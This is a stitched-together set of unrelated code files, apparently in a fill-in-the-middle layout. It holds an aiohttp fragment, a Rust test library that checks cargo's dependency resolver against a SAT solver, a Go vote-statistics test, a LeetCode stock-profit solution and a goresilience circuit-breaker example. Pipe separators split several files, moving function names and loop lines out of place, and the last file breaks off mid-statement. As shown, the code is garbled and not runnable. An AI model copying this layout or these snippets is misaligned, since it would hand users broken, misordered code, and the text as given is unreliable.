return web.Response(headers={'Access-Control-Allow-Methods': 'GET, OPTIONS'})
| await ws.send_json('command_performed')
continue |
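
# Minimal client sketch for the POST endpoint served by ApiHandler above; the
# address is a placeholder, and the payload keys match what handle_api_request reads.
import asyncio
import aiohttp

async def ask_bot():
    async with aiohttp.ClientSession() as session:
        async with session.post('http://localhost:4242/',
                                json={'user_id': 'alice', 'payload': 'hello'}) as resp:
            print(await resp.json())

asyncio.run(ask_bot())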
lib.rs | #![allow(clippy::many_single_char_names)]
#![allow(clippy::needless_range_loop)] // false positives
use std::cell::RefCell;
use std::cmp::PartialEq;
use std::cmp::{max, min};
use std::collections::{BTreeMap, BTreeSet, HashMap, HashSet};
use std::fmt;
use std::fmt::Write;
use std::rc::Rc;
use std::time::Instant;
use cargo::core::dependency::Kind;
use cargo::core::resolver::{self, ResolveOpts};
use cargo::core::source::{GitReference, SourceId};
use cargo::core::Resolve;
use cargo::core::{Dependency, PackageId, Registry, Summary};
use cargo::util::{CargoResult, Config, Graph, IntoUrl};
use proptest::collection::{btree_map, vec};
use proptest::prelude::*;
use proptest::sample::Index;
use proptest::string::string_regex;
use varisat::{self, ExtendFormula};
pub fn resolve(deps: Vec<Dependency>, registry: &[Summary]) -> CargoResult<Vec<PackageId>> {
resolve_with_config(deps, registry, None)
}
pub fn resolve_and_validated(
deps: Vec<Dependency>,
registry: &[Summary],
sat_resolve: Option<SatResolve>,
) -> CargoResult<Vec<PackageId>> {
let resolve = resolve_with_config_raw(deps.clone(), registry, None);
match resolve {
Err(e) => {
let sat_resolve = sat_resolve.unwrap_or_else(|| SatResolve::new(registry));
if sat_resolve.sat_resolve(&deps) {
panic!(
"the resolve err but the sat_resolve thinks this will work:\n{}",
sat_resolve.use_packages().unwrap()
);
}
Err(e)
}
Ok(resolve) => {
let mut stack = vec![pkg_id("root")];
let mut used = HashSet::new();
let mut links = HashSet::new();
while let Some(p) = stack.pop() {
assert!(resolve.contains(&p));
if used.insert(p) {
// in the tests all `links` crates end in `-sys`
if p.name().ends_with("-sys") {
assert!(links.insert(p.name()));
}
stack.extend(resolve.deps(p).map(|(dp, deps)| {
for d in deps {
assert!(d.matches_id(dp));
}
dp
}));
}
}
let out = resolve.sort();
assert_eq!(out.len(), used.len());
let mut pub_deps: HashMap<PackageId, HashSet<_>> = HashMap::new();
for &p in out.iter() {
// make the list of `p` public dependencies
let mut self_pub_dep = HashSet::new();
self_pub_dep.insert(p);
for (dp, deps) in resolve.deps(p) {
if deps.iter().any(|d| d.is_public()) {
self_pub_dep.extend(pub_deps[&dp].iter().cloned())
}
}
pub_deps.insert(p, self_pub_dep);
// check if `p` has a public dependencies conflicts
let seen_dep: BTreeSet<_> = resolve
.deps(p)
.flat_map(|(dp, _)| pub_deps[&dp].iter().cloned())
.collect();
let seen_dep: Vec<_> = seen_dep.iter().collect();
for a in seen_dep.windows(2) {
if a[0].name() == a[1].name() {
panic!(
"the package {:?} can publicly see {:?} and {:?}",
p, a[0], a[1]
)
}
}
}
let sat_resolve = sat_resolve.unwrap_or_else(|| SatResolve::new(registry));
if !sat_resolve.sat_is_valid_solution(&out) {
panic!(
"the sat_resolve err but the resolve thinks this will work:\n{:?}",
resolve
);
}
Ok(out)
}
}
}
pub fn resolve_with_config(
deps: Vec<Dependency>,
registry: &[Summary],
config: Option<&Config>,
) -> CargoResult<Vec<PackageId>> {
let resolve = resolve_with_config_raw(deps, registry, config)?;
Ok(resolve.sort())
}
pub fn resolve_with_config_raw(
deps: Vec<Dependency>,
registry: &[Summary],
config: Option<&Config>,
) -> CargoResult<Resolve> {
struct MyRegistry<'a> {
list: &'a [Summary],
used: HashSet<PackageId>,
    }
impl<'a> Registry for MyRegistry<'a> {
fn query(
&mut self,
dep: &Dependency,
f: &mut dyn FnMut(Summary),
fuzzy: bool,
) -> CargoResult<()> {
for summary in self.list.iter() {
if fuzzy || dep.matches(summary) {
self.used.insert(summary.package_id());
f(summary.clone());
}
}
Ok(())
}
fn describe_source(&self, _src: SourceId) -> String {
String::new()
}
fn is_replaced(&self, _src: SourceId) -> bool {
false
}
}
impl<'a> Drop for MyRegistry<'a> {
fn drop(&mut self) {
if std::thread::panicking() && self.list.len() != self.used.len() {
// we found a case that causes a panic and did not use all of the input.
                // let's print the part of the input that was used, for minimization.
println!(
"{:?}",
PrettyPrintRegistry(
self.list
.iter()
.filter(|s| { self.used.contains(&s.package_id()) })
.cloned()
.collect()
)
);
}
}
}
let mut registry = MyRegistry {
list: registry,
used: HashSet::new(),
};
let summary = Summary::new(
pkg_id("root"),
deps,
&BTreeMap::<String, Vec<String>>::new(),
None::<&String>,
false,
)
.unwrap();
let opts = ResolveOpts::everything();
let start = Instant::now();
let resolve = resolver::resolve(
&[(summary, opts)],
&[],
&mut registry,
&HashSet::new(),
config,
true,
);
    // The largest test in our suite takes less than 30 sec.
    // So let's fail the test if we have been running for too long.
assert!(start.elapsed().as_secs() < 60);
resolve
}
const fn num_bits<T>() -> usize {
std::mem::size_of::<T>() * 8
}
fn log_bits(x: usize) -> usize {
if x == 0 {
return 0;
}
assert!(x > 0);
(num_bits::<usize>() as u32 - x.leading_zeros()) as usize
}
fn sat_at_most_one(solver: &mut impl varisat::ExtendFormula, vars: &[varisat::Var]) {
if vars.len() <= 1 {
return;
} else if vars.len() == 2 {
solver.add_clause(&[vars[0].negative(), vars[1].negative()]);
return;
} else if vars.len() == 3 {
solver.add_clause(&[vars[0].negative(), vars[1].negative()]);
solver.add_clause(&[vars[0].negative(), vars[2].negative()]);
solver.add_clause(&[vars[1].negative(), vars[2].negative()]);
return;
}
// use the "Binary Encoding" from
// https://www.it.uu.se/research/group/astra/ModRef10/papers/Alan%20M.%20Frisch%20and%20Paul%20A.%20Giannoros.%20SAT%20Encodings%20of%20the%20At-Most-k%20Constraint%20-%20ModRef%202010.pdf
let bits: Vec<varisat::Var> = solver.new_var_iter(log_bits(vars.len())).collect();
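    // The clauses below tie each var to the binary representation of its index:
    // if vars[i] is true, every commander bit must equal the matching bit of i.
    // Two true vars with different indices would force some bit to be both 0
    // and 1, so at most one of `vars` can be satisfied.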
for (i, p) in vars.iter().enumerate() {
for b in 0..bits.len() {
solver.add_clause(&[p.negative(), bits[b].lit(((1 << b) & i) > 0)]);
}
}
}
fn sat_at_most_one_by_key<K: std::hash::Hash + Eq>(
cnf: &mut impl varisat::ExtendFormula,
data: impl Iterator<Item = (K, varisat::Var)>,
) -> HashMap<K, Vec<varisat::Var>> {
// no two packages with the same links set
let mut by_keys: HashMap<K, Vec<varisat::Var>> = HashMap::new();
for (p, v) in data {
by_keys.entry(p).or_default().push(v)
}
for key in by_keys.values() {
sat_at_most_one(cnf, key);
}
by_keys
}
/// Resolution can be reduced to the SAT problem. So this is an alternative implementation
/// of the resolver that uses a SAT library for the hard work. This is intended to be easy to read,
/// as compared to the real resolver.
///
/// For the subset of functionality currently exercised by `registry_strategy`, this will
/// find a valid resolution if one exists. The big thing that the real resolver does,
/// and that this one does not, is work with features and optional dependencies.
///
/// The SAT library does not optimize for the newest version,
/// so the selected packages may not match the real resolver.
#[derive(Clone)]
pub struct SatResolve(Rc<RefCell<SatResolveInner>>);
struct SatResolveInner {
solver: varisat::Solver<'static>,
var_for_is_packages_used: HashMap<PackageId, varisat::Var>,
by_name: HashMap<&'static str, Vec<PackageId>>,
}
impl SatResolve {
pub fn new(registry: &[Summary]) -> Self {
let mut cnf = varisat::CnfFormula::new();
let var_for_is_packages_used: HashMap<PackageId, varisat::Var> = registry
.iter()
.map(|s| (s.package_id(), cnf.new_var()))
.collect();
// no two packages with the same links set
sat_at_most_one_by_key(
&mut cnf,
registry
.iter()
.map(|s| (s.links(), var_for_is_packages_used[&s.package_id()]))
.filter(|(l, _)| l.is_some()),
);
// no two semver compatible versions of the same package
let by_activations_keys = sat_at_most_one_by_key(
&mut cnf,
var_for_is_packages_used
.iter()
.map(|(p, &v)| (p.as_activations_key(), v)),
);
let mut by_name: HashMap<&'static str, Vec<PackageId>> = HashMap::new();
for p in registry.iter() {
by_name
.entry(p.name().as_str())
.or_default()
.push(p.package_id())
}
let empty_vec = vec![];
let mut graph: Graph<PackageId, ()> = Graph::new();
let mut version_selected_for: HashMap<
PackageId,
HashMap<Dependency, HashMap<_, varisat::Var>>,
> = HashMap::new();
    // active packages need each of their `deps` to be satisfied
for p in registry.iter() {
graph.add(p.package_id());
for dep in p.dependencies() {
// This can more easily be written as:
// !is_active(p) or one of the things that match dep is_active
// All the complexity, from here to the end, is to support public and private dependencies!
let mut by_key: HashMap<_, Vec<varisat::Lit>> = HashMap::new();
for &m in by_name
.get(dep.package_name().as_str())
.unwrap_or(&empty_vec)
.iter()
.filter(|&p| dep.matches_id(*p))
{
graph.link(p.package_id(), m);
by_key
.entry(m.as_activations_key())
.or_default()
.push(var_for_is_packages_used[&m].positive());
}
let keys: HashMap<_, _> = by_key.keys().map(|&k| (k, cnf.new_var())).collect();
// if `p` is active then we need to select one of the keys
let matches: Vec<_> = keys
.values()
.map(|v| v.positive())
.chain(Some(var_for_is_packages_used[&p.package_id()].negative()))
.collect();
cnf.add_clause(&matches);
// if a key is active then we need to select one of the versions
for (key, vars) in by_key.iter() {
let mut matches = vars.clone();
matches.push(keys[key].negative());
cnf.add_clause(&matches);
}
version_selected_for
.entry(p.package_id())
.or_default()
.insert(dep.clone(), keys);
}
}
let topological_order = graph.sort();
// we already ensure there is only one version for each `activations_key` so we can think of
// `publicly_exports` as being in terms of a set of `activations_key`s
let mut publicly_exports: HashMap<_, HashMap<_, varisat::Var>> = HashMap::new();
for &key in by_activations_keys.keys() {
// everything publicly depends on itself
let var = publicly_exports
.entry(key)
.or_default()
.entry(key)
.or_insert_with(|| cnf.new_var());
cnf.add_clause(&[var.positive()]);
}
// if a `dep` is public then `p` `publicly_exports` all the things that the selected version `publicly_exports`
for &p in topological_order.iter() {
if let Some(deps) = version_selected_for.get(&p) {
let mut p_exports = publicly_exports.remove(&p.as_activations_key()).unwrap();
for (_, versions) in deps.iter().filter(|(d, _)| d.is_public()) {
for (ver, sel) in versions {
for (&export_pid, &export_var) in publicly_exports[ver].iter() {
let our_var =
p_exports.entry(export_pid).or_insert_with(|| cnf.new_var());
cnf.add_clause(&[
sel.negative(),
export_var.negative(),
our_var.positive(),
]);
}
}
}
publicly_exports.insert(p.as_activations_key(), p_exports);
}
}
// we already ensure there is only one version for each `activations_key` so we can think of
// `can_see` as being in terms of a set of `activations_key`s
// and if `p` `publicly_exports` `export` then it `can_see` `export`
let mut can_see: HashMap<_, HashMap<_, varisat::Var>> = HashMap::new();
// if `p` has a `dep` that selected `ver` then it `can_see` all the things that the selected version `publicly_exports`
for (&p, deps) in version_selected_for.iter() {
let p_can_see = can_see.entry(p).or_default();
for (_, versions) in deps.iter() {
for (&ver, sel) in versions {
for (&export_pid, &export_var) in publicly_exports[&ver].iter() {
let our_var = p_can_see.entry(export_pid).or_insert_with(|| cnf.new_var());
cnf.add_clause(&[
sel.negative(),
export_var.negative(),
our_var.positive(),
]);
}
}
}
}
// a package `can_see` only one version by each name
for (_, see) in can_see.iter() {
sat_at_most_one_by_key(&mut cnf, see.iter().map(|((name, _, _), &v)| (name, v)));
}
let mut solver = varisat::Solver::new();
solver.add_formula(&cnf);
    // We don't need to `solve` now. We know that "use nothing" will satisfy all the clauses so far.
// But things run faster if we let it spend some time figuring out how the constraints interact before we add assumptions.
solver
.solve()
.expect("docs say it can't error in default config");
SatResolve(Rc::new(RefCell::new(SatResolveInner {
solver,
var_for_is_packages_used,
by_name,
})))
}
pub fn sat_resolve(&self, deps: &[Dependency]) -> bool {
let mut s = self.0.borrow_mut();
let mut assumption = vec![];
let mut this_call = None;
// the starting `deps` need to be satisfied
for dep in deps.iter() {
let empty_vec = vec![];
let matches: Vec<varisat::Lit> = s
.by_name
.get(dep.package_name().as_str())
.unwrap_or(&empty_vec)
.iter()
.filter(|&p| dep.matches_id(*p))
.map(|p| s.var_for_is_packages_used[p].positive())
.collect();
if matches.is_empty() {
return false;
} else if matches.len() == 1 {
assumption.extend_from_slice(&matches)
} else {
if this_call.is_none() {
let new_var = s.solver.new_var();
this_call = Some(new_var);
assumption.push(new_var.positive());
}
let mut matches = matches;
matches.push(this_call.unwrap().negative());
s.solver.add_clause(&matches);
}
}
s.solver.assume(&assumption);
s.solver
.solve()
.expect("docs say it can't error in default config")
}
pub fn sat_is_valid_solution(&self, pids: &[PackageId]) -> bool {
let mut s = self.0.borrow_mut();
for p in pids {
if p.name().as_str() != "root" && !s.var_for_is_packages_used.contains_key(p) {
return false;
}
}
let assumption: Vec<_> = s
.var_for_is_packages_used
.iter()
.map(|(p, v)| v.lit(pids.contains(p)))
.collect();
s.solver.assume(&assumption);
s.solver
.solve()
.expect("docs say it can't error in default config")
}
fn use_packages(&self) -> Option<String> {
self.0.borrow().solver.model().map(|lits| {
let lits: HashSet<_> = lits
.iter()
.filter(|l| l.is_positive())
.map(|l| l.var())
.collect();
let mut out = String::new();
out.push_str("used:\n");
for (p, v) in self.0.borrow().var_for_is_packages_used.iter() {
if lits.contains(v) {
writeln!(&mut out, " {}", p).unwrap();
}
}
out
})
}
}
pub trait ToDep {
fn to_dep(self) -> Dependency;
}
impl ToDep for &'static str {
fn to_dep(self) -> Dependency {
Dependency::parse_no_deprecated(self, Some("1.0.0"), registry_loc()).unwrap()
}
}
impl ToDep for Dependency {
fn to_dep(self) -> Dependency {
self
}
}
pub trait ToPkgId {
fn to_pkgid(&self) -> PackageId;
}
impl ToPkgId for PackageId {
fn to_pkgid(&self) -> PackageId {
*self
}
}
impl<'a> ToPkgId for &'a str {
fn to_pkgid(&self) -> PackageId {
PackageId::new(*self, "1.0.0", registry_loc()).unwrap()
}
}
impl<T: AsRef<str>, U: AsRef<str>> ToPkgId for (T, U) {
fn to_pkgid(&self) -> PackageId {
let (name, vers) = self;
PackageId::new(name.as_ref(), vers.as_ref(), registry_loc()).unwrap()
}
}
#[macro_export]
macro_rules! pkg {
($pkgid:expr => [$($deps:expr),+ $(,)* ]) => ({
let d: Vec<Dependency> = vec![$($deps.to_dep()),+];
$crate::pkg_dep($pkgid, d)
});
($pkgid:expr) => ({
$crate::pkg($pkgid)
})
}
fn registry_loc() -> SourceId {
lazy_static::lazy_static! {
static ref EXAMPLE_DOT_COM: SourceId =
SourceId::for_registry(&"https://example.com".into_url().unwrap()).unwrap();
}
*EXAMPLE_DOT_COM
}
pub fn pkg<T: ToPkgId>(name: T) -> Summary {
pkg_dep(name, Vec::new())
}
pub fn pkg_dep<T: ToPkgId>(name: T, dep: Vec<Dependency>) -> Summary {
let pkgid = name.to_pkgid();
let link = if pkgid.name().ends_with("-sys") {
Some(pkgid.name().as_str())
} else {
None
};
Summary::new(
name.to_pkgid(),
dep,
&BTreeMap::<String, Vec<String>>::new(),
link,
false,
)
.unwrap()
}
pub fn pkg_id(name: &str) -> PackageId {
PackageId::new(name, "1.0.0", registry_loc()).unwrap()
}
fn pkg_id_loc(name: &str, loc: &str) -> PackageId {
let remote = loc.into_url();
let master = GitReference::Branch("master".to_string());
let source_id = SourceId::for_git(&remote.unwrap(), master).unwrap();
PackageId::new(name, "1.0.0", source_id).unwrap()
}
pub fn pkg_loc(name: &str, loc: &str) -> Summary {
let link = if name.ends_with("-sys") {
Some(name)
} else {
None
};
Summary::new(
pkg_id_loc(name, loc),
Vec::new(),
&BTreeMap::<String, Vec<String>>::new(),
link,
false,
)
.unwrap()
}
pub fn remove_dep(sum: &Summary, ind: usize) -> Summary {
let mut deps = sum.dependencies().to_vec();
deps.remove(ind);
// note: more things will need to be copied over in the future, but it works for now.
Summary::new(
sum.package_id(),
deps,
&BTreeMap::<String, Vec<String>>::new(),
sum.links().map(|a| a.as_str()),
sum.namespaced_features(),
)
.unwrap()
}
pub fn dep(name: &str) -> Dependency {
dep_req(name, "*")
}
pub fn dep_req(name: &str, req: &str) -> Dependency {
Dependency::parse_no_deprecated(name, Some(req), registry_loc()).unwrap()
}
pub fn dep_req_kind(name: &str, req: &str, kind: Kind, public: bool) -> Dependency {
let mut dep = dep_req(name, req);
dep.set_kind(kind);
dep.set_public(public);
dep
}
pub fn dep_loc(name: &str, location: &str) -> Dependency {
let url = location.into_url().unwrap();
let master = GitReference::Branch("master".to_string());
let source_id = SourceId::for_git(&url, master).unwrap();
Dependency::parse_no_deprecated(name, Some("1.0.0"), source_id).unwrap()
}
pub fn dep_kind(name: &str, kind: Kind) -> Dependency {
dep(name).set_kind(kind).clone()
}
pub fn registry(pkgs: Vec<Summary>) -> Vec<Summary> {
pkgs
}
pub fn names<P: ToPkgId>(names: &[P]) -> Vec<PackageId> {
names.iter().map(|name| name.to_pkgid()).collect()
}
pub fn loc_names(names: &[(&'static str, &'static str)]) -> Vec<PackageId> {
names
.iter()
.map(|&(name, loc)| pkg_id_loc(name, loc))
.collect()
}
/// By default `Summary` and `Dependency` have a very verbose `Debug` representation.
/// This replaces it with a representation that uses constructors from this file.
///
/// If `registry_strategy` is improved to modify more fields
/// then this needs to be updated to display the corresponding constructor.
pub struct PrettyPrintRegistry(pub Vec<Summary>);
impl fmt::Debug for PrettyPrintRegistry {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
write!(f, "vec![")?;
for s in &self.0 {
if s.dependencies().is_empty() {
write!(f, "pkg!((\"{}\", \"{}\")),", s.name(), s.version())?;
} else {
write!(f, "pkg!((\"{}\", \"{}\") => [", s.name(), s.version())?;
for d in s.dependencies() {
if d.kind() == Kind::Normal
&& &d.version_req().to_string() == "*"
&& !d.is_public()
{
write!(f, "dep(\"{}\"),", d.name_in_toml())?;
} else if d.kind() == Kind::Normal && !d.is_public() {
write!(
f,
"dep_req(\"{}\", \"{}\"),",
d.name_in_toml(),
d.version_req()
)?;
} else {
write!(
f,
"dep_req_kind(\"{}\", \"{}\", {}, {}),",
d.name_in_toml(),
d.version_req(),
match d.kind() {
Kind::Development => "Kind::Development",
Kind::Build => "Kind::Build",
Kind::Normal => "Kind::Normal",
},
d.is_public()
)?;
}
}
write!(f, "]),")?;
}
}
write!(f, "]")
}
}
#[test]
fn | () {
assert_eq!(
&format!(
"{:?}",
PrettyPrintRegistry(vec![
pkg!(("foo", "1.0.1") => [dep_req("bar", "1")]),
pkg!(("foo", "1.0.0") => [dep_req("bar", "2")]),
pkg!(("foo", "2.0.0") => [dep_req("bar", "*")]),
pkg!(("bar", "1.0.0") => [dep_req("baz", "=1.0.2"),
dep_req("other", "1")]),
pkg!(("bar", "2.0.0") => [dep_req("baz", "=1.0.1")]),
pkg!(("baz", "1.0.2") => [dep_req("other", "2")]),
pkg!(("baz", "1.0.1")),
pkg!(("cat", "1.0.2") => [dep_req_kind("other", "2", Kind::Build, false)]),
pkg!(("cat", "1.0.3") => [dep_req_kind("other", "2", Kind::Development, false)]),
pkg!(("dep_req", "1.0.0")),
pkg!(("dep_req", "2.0.0")),
])
),
"vec![pkg!((\"foo\", \"1.0.1\") => [dep_req(\"bar\", \"^1\"),]),\
pkg!((\"foo\", \"1.0.0\") => [dep_req(\"bar\", \"^2\"),]),\
pkg!((\"foo\", \"2.0.0\") => [dep(\"bar\"),]),\
pkg!((\"bar\", \"1.0.0\") => [dep_req(\"baz\", \"= 1.0.2\"),dep_req(\"other\", \"^1\"),]),\
pkg!((\"bar\", \"2.0.0\") => [dep_req(\"baz\", \"= 1.0.1\"),]),\
pkg!((\"baz\", \"1.0.2\") => [dep_req(\"other\", \"^2\"),]),\
pkg!((\"baz\", \"1.0.1\")),\
pkg!((\"cat\", \"1.0.2\") => [dep_req_kind(\"other\", \"^2\", Kind::Build, false),]),\
pkg!((\"cat\", \"1.0.3\") => [dep_req_kind(\"other\", \"^2\", Kind::Development, false),]),\
pkg!((\"dep_req\", \"1.0.0\")),\
pkg!((\"dep_req\", \"2.0.0\")),]"
)
}
/// This generates a random registry index.
/// Unlike vec((Name, Ver, vec((Name, VerRq), ..), ..))
/// this strategy has a high probability of generating valid dependencies
pub fn registry_strategy(
max_crates: usize,
max_versions: usize,
shrinkage: usize,
) -> impl Strategy<Value = PrettyPrintRegistry> {
let name = string_regex("[A-Za-z][A-Za-z0-9_-]*(-sys)?").unwrap();
let raw_version = ..max_versions.pow(3);
let version_from_raw = move |r: usize| {
let major = ((r / max_versions) / max_versions) % max_versions;
let minor = (r / max_versions) % max_versions;
let patch = r % max_versions;
format!("{}.{}.{}", major, minor, patch)
};
    // If this is false then the crate will depend on the nonexistent "bad"
// instead of the complex set we generated for it.
let allow_deps = prop::bool::weighted(0.99);
let list_of_versions =
btree_map(raw_version, allow_deps, 1..=max_versions).prop_map(move |ver| {
ver.into_iter()
.map(|a| (version_from_raw(a.0), a.1))
.collect::<Vec<_>>()
});
let list_of_crates_with_versions =
btree_map(name, list_of_versions, 1..=max_crates).prop_map(|mut vers| {
// root is the name of the thing being compiled
// so it would be confusing to have it in the index
vers.remove("root");
// bad is a name reserved for a dep that won't work
vers.remove("bad");
vers
});
    // each version of each crate can depend on each crate smaller than it.
// In theory shrinkage should be 2, but in practice we get better trees with a larger value.
let max_deps = max_versions * (max_crates * (max_crates - 1)) / shrinkage;
let raw_version_range = (any::<Index>(), any::<Index>());
let raw_dependency = (
any::<Index>(),
any::<Index>(),
raw_version_range,
0..=1,
Just(false),
// TODO: ^ this needs to be set back to `any::<bool>()` and work before public & private dependencies can stabilize
);
fn order_index(a: Index, b: Index, size: usize) -> (usize, usize) {
let (a, b) = (a.index(size), b.index(size));
(min(a, b), max(a, b))
}
let list_of_raw_dependency = vec(raw_dependency, ..=max_deps);
// By default a package depends only on other packages that have a smaller name,
// this helps make sure that all things in the resulting index are DAGs.
    // If this is true then the DAG is maintained with greater instead.
let reverse_alphabetical = any::<bool>().no_shrink();
(
list_of_crates_with_versions,
list_of_raw_dependency,
reverse_alphabetical,
)
.prop_map(
|(crate_vers_by_name, raw_dependencies, reverse_alphabetical)| {
let list_of_pkgid: Vec<_> = crate_vers_by_name
.iter()
.flat_map(|(name, vers)| vers.iter().map(move |x| ((name.as_str(), &x.0), x.1)))
.collect();
let len_all_pkgid = list_of_pkgid.len();
let mut dependency_by_pkgid = vec![vec![]; len_all_pkgid];
for (a, b, (c, d), k, p) in raw_dependencies {
let (a, b) = order_index(a, b, len_all_pkgid);
let (a, b) = if reverse_alphabetical { (b, a) } else { (a, b) };
let ((dep_name, _), _) = list_of_pkgid[a];
if (list_of_pkgid[b].0).0 == dep_name {
continue;
}
let s = &crate_vers_by_name[dep_name];
let s_last_index = s.len() - 1;
let (c, d) = order_index(c, d, s.len());
dependency_by_pkgid[b].push(dep_req_kind(
dep_name,
&if c == 0 && d == s_last_index {
"*".to_string()
} else if c == 0 {
format!("<={}", s[d].0)
} else if d == s_last_index {
format!(">={}", s[c].0)
} else if c == d {
format!("={}", s[c].0)
} else {
format!(">={}, <={}", s[c].0, s[d].0)
},
match k {
0 => Kind::Normal,
1 => Kind::Build,
// => Kind::Development, // Development has no impact so don't gen
_ => panic!("bad index for Kind"),
},
p && k == 0,
))
}
let mut out: Vec<Summary> = list_of_pkgid
.into_iter()
.zip(dependency_by_pkgid.into_iter())
.map(|(((name, ver), allow_deps), deps)| {
pkg_dep(
(name, ver).to_pkgid(),
if !allow_deps {
vec![dep_req("bad", "*")]
} else {
let mut deps = deps;
deps.sort_by_key(|d| d.name_in_toml());
deps.dedup_by_key(|d| d.name_in_toml());
deps
},
)
})
.collect();
if reverse_alphabetical {
// make sure the complicated cases are at the end
out.reverse();
}
PrettyPrintRegistry(out)
},
)
}
/// This test exercises the generator to ensure
/// that it makes registries with large dependency trees
#[test]
fn meta_test_deep_trees_from_strategy() {
use proptest::strategy::ValueTree;
use proptest::test_runner::TestRunner;
let mut dis = [0; 21];
let strategy = registry_strategy(50, 20, 60);
let mut test_runner = TestRunner::deterministic();
for _ in 0..128 {
let PrettyPrintRegistry(input) = strategy
.new_tree(&mut TestRunner::new_with_rng(
Default::default(),
test_runner.new_rng(),
))
.unwrap()
.current();
let reg = registry(input.clone());
for this in input.iter().rev().take(10) {
let res = resolve(
vec![dep_req(&this.name(), &format!("={}", this.version()))],
®,
);
dis[res
.as_ref()
.map(|x| min(x.len(), dis.len()) - 1)
.unwrap_or(0)] += 1;
if dis.iter().all(|&x| x > 0) {
return;
}
}
}
panic!(
"In 1280 tries we did not see a wide enough distribution of dependency trees! dis: {:?}",
dis
);
}
/// This test exercises the generator to ensure
/// that it makes registries that include multiple versions of the same library
#[test]
fn meta_test_multiple_versions_strategy() {
use proptest::strategy::ValueTree;
use proptest::test_runner::TestRunner;
let mut dis = [0; 10];
let strategy = registry_strategy(50, 20, 60);
let mut test_runner = TestRunner::deterministic();
for _ in 0..128 {
let PrettyPrintRegistry(input) = strategy
.new_tree(&mut TestRunner::new_with_rng(
Default::default(),
test_runner.new_rng(),
))
.unwrap()
.current();
let reg = registry(input.clone());
for this in input.iter().rev().take(10) {
let res = resolve(
vec![dep_req(&this.name(), &format!("={}", this.version()))],
®,
);
if let Ok(mut res) = res {
let res_len = res.len();
res.sort_by_key(|s| s.name());
res.dedup_by_key(|s| s.name());
dis[min(res_len - res.len(), dis.len() - 1)] += 1;
}
if dis.iter().all(|&x| x > 0) {
return;
}
}
}
panic!(
"In 1280 tries we did not see a wide enough distribution of multiple versions of the same library! dis: {:?}",
dis
);
}
/// Assert `xs` contains `elems`
pub fn assert_contains<A: PartialEq>(xs: &[A], elems: &[A]) {
for elem in elems {
assert!(xs.contains(elem));
}
}
pub fn assert_same<A: PartialEq>(a: &[A], b: &[A]) {
assert_eq!(a.len(), b.len());
assert_contains(b, a);
}
| meta_test_deep_pretty_print_registry |
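
# Minimal Python sketch (not the crate's API) of the binary "at most one"
# encoding used by sat_at_most_one above. Clauses are DIMACS-style lists of
# signed integers; a negative id is a negated literal.
def at_most_one(var_ids, next_free):
    clauses = []
    n_bits = (len(var_ids) - 1).bit_length()  # bits needed to index each var
    bits = list(range(next_free, next_free + n_bits))
    for i, v in enumerate(var_ids):
        for b, bit in enumerate(bits):
            # v true forces commander bit b to equal bit b of i
            clauses.append([-v, bit if (i >> b) & 1 else -bit])
    return clauses, next_free + n_bits

# making two of vars 1..4 true forces a commander bit to be 0 and 1 at once -> UNSAT
clauses, _ = at_most_one([1, 2, 3, 4], next_free=5)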
stats_test.go | package app
import (
"testing"
"github.com/stretchr/testify/assert"
)
// generateVote is used to generate a test vote struct
func generateVote() *Vote {
vote := new(Vote)
vote.Votes = make(map[string]string)
vote.Votes["alice"] = "levy"
vote.Votes["bob"] = "depraz"
return vote
}
func TestNewStatistics(t *testing.T) {
v := generateVote()
st := NewStatistics(v)
assert.Equal(t, 2, st.Total)
}
| func TestCreateStats(t *testing.T) {
v := generateVote()
expected := `Total: 2
levy (1): alice
depraz (1): bob
`
assert.Equal(t, expected, createStat(v))
} | |
121. Best Time to Buy and Sell Stock.go | package leetcode
func maxProfit(prices []int) int {
res, dp := 0, make([]int, len(prices))
for i := 1; i < len(prices); i++ {
dp[i] = prices[i] - prices[i-1]
}
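	// dp now holds day-over-day price deltas; the best single buy/sell equals
	// the maximum-sum subarray of these deltas, found below with Kadane's algorithm.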
for i := 1; i < len(dp); i++ {
if dp[i-1] > 0 {
dp[i] += dp[i-1]
} | }
return res
}
func max(a int, b int) int {
if a > b {
return a
}
return b
} | res = max(res, dp[i]) |
main.go | package main
import (
"context"
"fmt"
"math/rand"
"net/http"
"time"
"github.com/prometheus/client_golang/prometheus"
"github.com/prometheus/client_golang/prometheus/promhttp"
"github.com/slok/goresilience"
"github.com/slok/goresilience/bulkhead"
"github.com/slok/goresilience/circuitbreaker"
"github.com/slok/goresilience/metrics"
"github.com/slok/goresilience/retry"
"github.com/slok/goresilience/timeout"
)
// HystrixConf is the configuration of the hystrix runner.
type HystrixConf struct {
Circuitbreaker circuitbreaker.Config
Bulkhead bulkhead.Config
Retry retry.Config
Timeout timeout.Config
ID string
MetricsRecorder metrics.Recorder
}
// NewHystrix returns a runner that simulates the most used features
// of Netflix Hystrix library.
//
// It is a circuit breaker with a bulkhead, with a retry with timeout,
// in that order.
func NewHystrix(cfg HystrixConf) goresilience.Runner {
// The order of creating a Hystrix runner is:
// measured runners -> circuitbreaker -> bulkhead -> retry -> timeout
hystrixRunner := goresilience.RunnerChain(
metrics.NewMiddleware(cfg.ID, cfg.MetricsRecorder),
circuitbreaker.NewMiddleware(cfg.Circuitbreaker),
bulkhead.NewMiddleware(cfg.Bulkhead),
retry.NewMiddleware(cfg.Retry),
timeout.NewMiddleware(cfg.Timeout),
)
return hystrixRunner
}
type result struct {
err error
msg string
}
func | () {
// Prometheus registry to expose metrics.
promreg := prometheus.NewRegistry()
go func() {
http.ListenAndServe(":8081", promhttp.HandlerFor(promreg, promhttp.HandlerOpts{}))
}()
runner := NewHystrix(HystrixConf{
ID: "hystrix-example",
MetricsRecorder: metrics.NewPrometheusRecorder(promreg),
Bulkhead: bulkhead.Config{
MaxWaitTime: 6 * time.Second,
},
})
results := make(chan result)
	// Run an infinite loop executing calls using our runner.
go func() {
for {
time.Sleep(1 * time.Millisecond)
// Execute concurrently.
go func() {
// Execute our call to the service.
var msg string
err := runner.Run(context.TODO(), func(ctx context.Context) error {
now := time.Now()
				// If the minute is divisible by 3, return an error directly
if now.Minute()%3 == 0 {
return fmt.Errorf("huge system error")
}
var err error
switch time.Now().Nanosecond() % 10 {
case 0:
msg = "ok"
case 2, 9:
time.Sleep(750 * time.Millisecond)
err = fmt.Errorf("a error")
case 7:
time.Sleep(5 * time.Second)
msg = "ok"
default:
time.Sleep(20 * time.Millisecond)
if rand.Intn(1000)%2 == 0 {
msg = "ok"
} else {
err = fmt.Errorf("another error")
}
}
return err
})
// Send the result to our receiver outside this infinite loop.
results <- result{
